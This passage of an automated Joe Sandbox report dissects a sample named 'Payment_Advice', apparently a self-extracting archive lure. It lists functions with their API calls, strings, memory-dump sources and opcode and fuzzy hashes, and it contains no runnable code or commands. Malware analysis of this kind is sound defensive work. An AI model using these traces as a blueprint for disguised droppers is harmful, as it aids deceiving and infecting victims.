                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                    • String ID: "Q$($AQ
                                                                                                    • API String ID: 1061551593-1104973574
                                                                                                    • Opcode ID: 91237ee5ec0f6bbefe23cd867d6f1d90ba3901931f3e0e24741bb826fa31dd32
                                                                                                    • Instruction ID: 9d34cf0e06068293a69af71dcf3430a56c719ee9dbe6eb1a39372e0486c4670c
                                                                                                    • Opcode Fuzzy Hash: 91237ee5ec0f6bbefe23cd867d6f1d90ba3901931f3e0e24741bb826fa31dd32
                                                                                                    • Instruction Fuzzy Hash: 92910375604340AFE711DF25C84896BBBE8FFD9711F00491EF99AD3220DB70A949DB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                      • Part of subcall function 0050B92D: _wcsrchr.LIBVCRUNTIME ref: 0050B944
                                                                                                    • _wcslen.LIBCMT ref: 0050C197
                                                                                                    • _wcslen.LIBCMT ref: 0050C1DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                    • API String ID: 3513545583-31770016
                                                                                                    • Opcode ID: 6209e8143488dee1bafaad4b16f3709190b1173d30ae9c52bd4073c8d5ff42f1
                                                                                                    • Instruction ID: b6a0720744e9a6d5bbe7c7e48ea6e82a71632fdd593390e7db59f544d9bd2229
                                                                                                    • Opcode Fuzzy Hash: 6209e8143488dee1bafaad4b16f3709190b1173d30ae9c52bd4073c8d5ff42f1
                                                                                                    • Instruction Fuzzy Hash: 85411826540312A5D731AF74885AA7F7FA8FF82744F144A4EF9C26B5C1EB904EC2C395
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0050A275,?,?,00000800,?,0050A23A,?,0050755C), ref: 0050BBC5
                                                                                                    • _wcslen.LIBCMT ref: 0050BC3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                    • String ID: UNC$\\?\
                                                                                                    • API String ID: 3341907918-253988292
                                                                                                    • Opcode ID: a06cc48530d599d0ed5c8e950f288f0d60729463127e89b8de1f3768381d1baa
                                                                                                    • Instruction ID: 9f8e6b4a8e59d0001a11d968fff3ab5827324108dba4c44a5fa7dde4e0b64b24
                                                                                                    • Opcode Fuzzy Hash: a06cc48530d599d0ed5c8e950f288f0d60729463127e89b8de1f3768381d1baa
                                                                                                    • Instruction Fuzzy Hash: 4F417131840217A6FF21AF60CC89EEE7FA9BF85390F144465F855A71D1DBB4DED08A50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0051CD84
                                                                                                      • Part of subcall function 0051AF98: _wcschr.LIBVCRUNTIME ref: 0051B033
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$CompareString
                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                    • API String ID: 69343711-3358265660
                                                                                                    • Opcode ID: 0ba77cd4349032349db9fe4825995909603c01758e54a15c5e4f85c4024a3f1d
                                                                                                    • Instruction ID: 5a256ec320e241952456a00f82b5ec5da24cc15383c853eaf7b3253a894e1a25
                                                                                                    • Opcode Fuzzy Hash: 0ba77cd4349032349db9fe4825995909603c01758e54a15c5e4f85c4024a3f1d
                                                                                                    • Instruction Fuzzy Hash: 2F31A5769406099AEF26CB50CC45EEE7FBCFB55350F404566E501E7180EBB19EC48FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0051AAD2
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0051AB01
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0051AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease
                                                                                                    • String ID: -Q$7Q
                                                                                                    • API String ID: 1429681911-1037005211
                                                                                                    • Opcode ID: a93618839cc309f66ce6c4f069fd3f2db34c4d7b6da116c2732d009656a4895a
                                                                                                    • Instruction ID: 8e24d7c1b247325a41bce9b3a1030c6a4831676a0fef37eae7d85cebf4e57918
                                                                                                    • Opcode Fuzzy Hash: a93618839cc309f66ce6c4f069fd3f2db34c4d7b6da116c2732d009656a4895a
                                                                                                    • Instruction Fuzzy Hash: F7210A72108304FFD3019FA9DD4CE6FBFE9FB99265F040829FA4592220D6719A5C9B62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0050B9B8
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0050B9D6
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0050B9E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                    • String ID: %c:\
                                                                                                    • API String ID: 525462905-3142399695
                                                                                                    • Opcode ID: dd2ee7ccc6cfeb5a10347db92007539bd3f4da99dd3ea5aef7c8fa717150b94e
                                                                                                    • Instruction ID: c79f50c5ec19e52c2fe4e6d453463ba075cc126bcf54300808233b8a7ca2097c
                                                                                                    • Opcode Fuzzy Hash: dd2ee7ccc6cfeb5a10347db92007539bd3f4da99dd3ea5aef7c8fa717150b94e
                                                                                                    • Instruction Fuzzy Hash: 1D01D667600313B5EA306B259CCAD6FAF9CFFD6770B844C0AF544D60C2EB24D85482B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051B2BE
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0051B2D6
                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0051B304
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: GETPASSWORD1$xzU
                                                                                                    • API String ID: 445417207-150693504
                                                                                                    • Opcode ID: 96f5669b761a249bd8a99c4e15f45523d0e16fcc41054bcff466626a69aac539
                                                                                                    • Instruction ID: d4ed1fd5816ba5c0bc168f8118ae95604962550f5e4306a153991680cc2dabcc
                                                                                                    • Opcode Fuzzy Hash: 96f5669b761a249bd8a99c4e15f45523d0e16fcc41054bcff466626a69aac539
                                                                                                    • Instruction Fuzzy Hash: 3711E132900119B6FB219A689D4EFFE3F6CFB59710F000820FA45B30C0C7B5AA999761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0051B6ED
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0051B712
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0051B744
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0051B767
                                                                                                      • Part of subcall function 0051A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0051B73D,00000066), ref: 0051A6D5
                                                                                                      • Part of subcall function 0051A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A6EC
                                                                                                      • Part of subcall function 0051A6C2: LoadResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A703
                                                                                                      • Part of subcall function 0051A6C2: LockResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A712
                                                                                                      • Part of subcall function 0051A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A72D
                                                                                                      • Part of subcall function 0051A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A73E
                                                                                                      • Part of subcall function 0051A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0051A7A7
                                                                                                      • Part of subcall function 0051A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0051A7C6
                                                                                                      • Part of subcall function 0051A6C2: GlobalFree.KERNEL32(00000000), ref: 0051A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                                    • String ID: ]
                                                                                                    • API String ID: 1428510222-3352871620
                                                                                                    • Opcode ID: 6a1dd74a11a0d26cdee4c56135f6a1d438e0a3a50ee7255855150a5d559342b7
                                                                                                    • Instruction ID: bbefc552ee39f39eaf221aa37a290c44e1b5bd4b1e1cfaa8156d8b023c7a6885
                                                                                                    • Opcode Fuzzy Hash: 6a1dd74a11a0d26cdee4c56135f6a1d438e0a3a50ee7255855150a5d559342b7
                                                                                                    • Instruction Fuzzy Hash: F001C436941202A7FB1277789D0DAFF7EBAFBC1762F050410F900A7295DF718D895262
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051D64B
                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0051D661
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0051D675
                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0051D684
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: RENAMEDLG
                                                                                                    • API String ID: 445417207-3299779563
                                                                                                    • Opcode ID: 5144de719a166d8d0a6dfafcfa6168e952edbd9d42ff8ac816c54b194ef3b656
                                                                                                    • Instruction ID: a7a0a8195bbfb8cf7ab6069edf62e95ee1ae5977167984f8fae759fafefdab1d
                                                                                                    • Opcode Fuzzy Hash: 5144de719a166d8d0a6dfafcfa6168e952edbd9d42ff8ac816c54b194ef3b656
                                                                                                    • Instruction Fuzzy Hash: FC01B533648314BAE2114F689D09FAB7F6DBBAAB02F110521F206A20D1C7A29D4CE775
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00527E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00527E24,?,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002), ref: 00527E93
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00527EA6
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00527E24,?,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002,00000000), ref: 00527EC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 788368b17d702135ad74a0bdcf427f8b5f5c00241fab845bb58cf7e949ef1719
                                                                                                    • Instruction ID: dabb2d27196d0d5c34748637afeed2cfe668b63c1fe850f73ed220cb86b87688
                                                                                                    • Opcode Fuzzy Hash: 788368b17d702135ad74a0bdcf427f8b5f5c00241fab845bb58cf7e949ef1719
                                                                                                    • Instruction Fuzzy Hash: 69F04435904218BBDB159BA4DC49B9EBFB8FF45711F0180A9F805A22A0DB349E44DAA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0051081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                      • Part of subcall function 0051081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0050F2E4
                                                                                                    • GetProcAddress.KERNEL32(005481C8,CryptUnprotectMemory), ref: 0050F2F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                    • Opcode ID: d5e12f0f007d80a7a59f9c8d8b1e3bfab808fcd4e11ce22a86e6e66ff48b86b5
                                                                                                    • Instruction ID: 98918e856fd274eb18b6c1e1939d0a9e1a281b039954d3e29bc75df16a3449ce
                                                                                                    • Opcode Fuzzy Hash: d5e12f0f007d80a7a59f9c8d8b1e3bfab808fcd4e11ce22a86e6e66ff48b86b5
                                                                                                    • Instruction Fuzzy Hash: B6E08C70910702AEDB309F78994DB46BFD47F14710F14882DF0DAE3A90EAB8D5848B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00522BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252061734-0
                                                                                                    • Opcode ID: 597354c5381d37c260dc1f4baaa3dd0f357ddbd421d3b280fbd3fd2ddac812c5
                                                                                                    • Instruction ID: 2767cd1f8576a5b5b1b8db1bdbe0f284c27a013a8c4a1d923e52db6eae83d75e
                                                                                                    • Opcode Fuzzy Hash: 597354c5381d37c260dc1f4baaa3dd0f357ddbd421d3b280fbd3fd2ddac812c5
                                                                                                    • Instruction Fuzzy Hash: 1451DF7A601222BFDB298F14E849BAA7FA4FF56310F24442DEC01576E1D771ED81DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0052BF39
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0052BF5C
                                                                                                      • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0052BF82
                                                                                                    • _free.LIBCMT ref: 0052BF95
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0052BFA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: ee1cc4f6f7600ceb0c05113a65af62511a419388247ce2a65e37210819731085
                                                                                                    • Instruction ID: d2a08938f647d28cb6b9c0c09ee4004245cfd39c61494c345041baf7d3833a44
                                                                                                    • Opcode Fuzzy Hash: ee1cc4f6f7600ceb0c05113a65af62511a419388247ce2a65e37210819731085
                                                                                                    • Instruction Fuzzy Hash: 8A017CA2606A267F33211ABA7D8DC7B6F6DFEC3BA13150129F904D2281FF608D01D5B0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,005291AD,0052B188,?,00529813,00000001,00000364,?,005240EF,?,?,00541098), ref: 0052986E
                                                                                                    • _free.LIBCMT ref: 005298A3
                                                                                                    • _free.LIBCMT ref: 005298CA
